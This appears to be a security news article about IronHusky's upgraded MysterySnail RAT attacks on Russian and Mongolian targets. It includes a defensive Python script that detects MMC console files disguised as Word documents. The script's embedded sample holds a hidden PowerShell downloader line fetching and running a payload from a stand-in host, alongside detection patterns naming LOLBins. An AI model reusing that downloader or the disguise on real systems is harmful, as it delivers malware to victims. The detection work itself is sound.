IronHusky targets Russia with the upgraded MysterySnail RAT

April 25, 2025

IronHusky, a notorious Chinese-speaking threat group, is targeting government organisations in Russia and Mongolia with an improved version of the MysterySnail remote access trojan (RAT).

Researchers found the updated malware while investigating recent attacks in which the RAT was delivered through a malicious Microsoft Management Console (MMC) script disguised as a Word document.

This script downloaded second-stage payloads and ensured persistence on compromised systems.

One of these payloads is a previously unidentified intermediary backdoor that transfers files between the C2 servers and compromised devices, runs command shells, spawns new processes, deletes files, and more.
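The delivery step above, an MMC console file posing as a Word document, is something a responder can triage on a file share or mail gateway without detonating it. The script below is an added example written for this article, not code from the researchers or the campaign. It assumes that .msc files are XML documents with an <MMC_ConsoleFile> root and that an attacker-controlled console carries its command lines or download URLs in element attributes or text; the sample console and filename are constructed for illustration and are not real indicators from the report.

```python
"""Triage helper for MMC console files (.msc) masquerading as Word documents.

Assumptions (not from the article): .msc files are XML with an
<MMC_ConsoleFile> root, and a weaponised console carries command lines
or URLs in element attributes or text nodes. SAMPLE_* below is constructed.
"""
import re
import xml.etree.ElementTree as ET

# Filenames that read like Office documents, including double extensions
# such as "Contract.docx.msc", which is the disguise the campaign relied on.
DOC_LOOKALIKE = re.compile(r"\.(docx?|rtf)(\.|$)", re.IGNORECASE)

# Signs of live code inside a console file: interpreters, LOLBins, URLs,
# UNC paths and executable/script extensions.
SUSPICIOUS = re.compile(
    r"(cmd(\.exe)?\b|powershell|mshta|rundll32|regsvr32|wscript|cscript|"
    r"certutil|https?://|\\\\[^\s]+|\.(exe|dll|ps1|vbs|js|hta)\b)",
    re.IGNORECASE,
)

DOCX_MAGIC = b"PK\x03\x04"        # OOXML (.docx) is a ZIP container
DOC_MAGIC = b"\xd0\xcf\x11\xe0"   # legacy .doc is an OLE compound file


def is_msc(data: bytes) -> bool:
    """True if the file body is an MMC console document (assumed XML root)."""
    return b"<MMC_ConsoleFile" in data.lstrip()[:512]


def extract_indicators(data: bytes) -> list[str]:
    """Return attribute values and text nodes that look like commands or URLs."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return []
    hits = []
    for el in root.iter():
        for value in list(el.attrib.values()) + [el.text or ""]:
            if SUSPICIOUS.search(value):
                hits.append(value.strip())
    return hits


def triage(name: str, data: bytes) -> dict:
    """Score one file: 'clean', 'suspicious' (one finding) or 'malicious' (several)."""
    result = {"name": name, "verdict": "clean", "reasons": [], "indicators": []}

    looks_like_doc = bool(DOC_LOOKALIKE.search(name))
    is_office = data.startswith(DOCX_MAGIC) or data.startswith(DOC_MAGIC)
    if looks_like_doc and not is_office:
        result["reasons"].append("Word-like filename but not an Office container")

    if is_msc(data):
        result["reasons"].append("MMC console file")
        result["indicators"] = extract_indicators(data)
        if result["indicators"]:
            result["reasons"].append("console carries command lines or URLs")

    if len(result["reasons"]) >= 2:
        result["verdict"] = "malicious"
    elif result["reasons"]:
        result["verdict"] = "suspicious"
    return result


# Constructed sample: a console whose taskpad launches a hidden PowerShell
# downloader. The hostname is a reserved test domain, not a real C2.
SAMPLE_NAME = "Contract_2025.docx.msc"
SAMPLE_MSC = b"""<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="Default">
  <StringTables><StringTable ID="1"><Strings>
    <String ID="1">Tasks</String>
  </Strings></StringTable></StringTables>
  <TaskpadList><Taskpad>
    <Tasks>
      <Task Type="CommandLine" Command="cmd.exe"
            Parameters="/c powershell -w hidden -c &quot;iwr http://example.invalid/stage2 -o %TEMP%\\s.exe; %TEMP%\\s.exe&quot;" />
    </Tasks>
  </Taskpad></TaskpadList>
</MMC_ConsoleFile>
"""

if __name__ == "__main__":
    verdict = triage(SAMPLE_NAME, SAMPLE_MSC)
    print(verdict["name"], verdict["verdict"])
    for reason in verdict["reasons"]:
        print("  -", reason)
    for ioc in verdict["indicators"]:
        print("  >", ioc)
```

Point the function at whatever lands in a quarantine folder; a genuine Word document passes both checks (the magic bytes match the name), while a console file carrying a command line trips the content check regardless of how it is named.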

IronHusky upgrades the MysterySnail RAT

According to the investigation, telemetry showed files that trace back to the MysterySnail RAT, which was first reported in 2021.

In the observed infections, researchers found that the RAT was set up to run continuously on compromised machines as a service.

Shortly after the researchers blocked the recent intrusions involving MysterySnail, the attackers continued their activity with a streamlined version of the RAT. This new variant consists of a single component and has been named MysteryMonoSnail.

The updated RAT supports a wide range of commands that let the attackers manage services on the infected device, execute shell commands, create and terminate processes, and manage files, among other capabilities.

The latest backdoor closely resembles the original MysterySnail RAT, which was first identified in late August 2021, nearly four years ago, during extensive espionage operations against IT companies, military and defence contractors, and diplomatic bodies in Russia and Mongolia.

During those incidents, IronHusky was observed deploying the malware on systems compromised through zero-day exploits for a vulnerability in the Windows Win32k kernel driver.

Researchers first identified this Chinese-speaking APT in 2017 while investigating a campaign against Russian and Mongolian government entities that aimed to gather intelligence on military negotiations between the two countries.

A year later, the group was seen exploiting a Microsoft Office memory corruption vulnerability to spread RATs commonly used by Chinese-speaking threat actors.

The researchers' report, released last week, includes indicators of compromise (IoCs) and further technical details on the recent attacks using the upgraded remote access trojan.
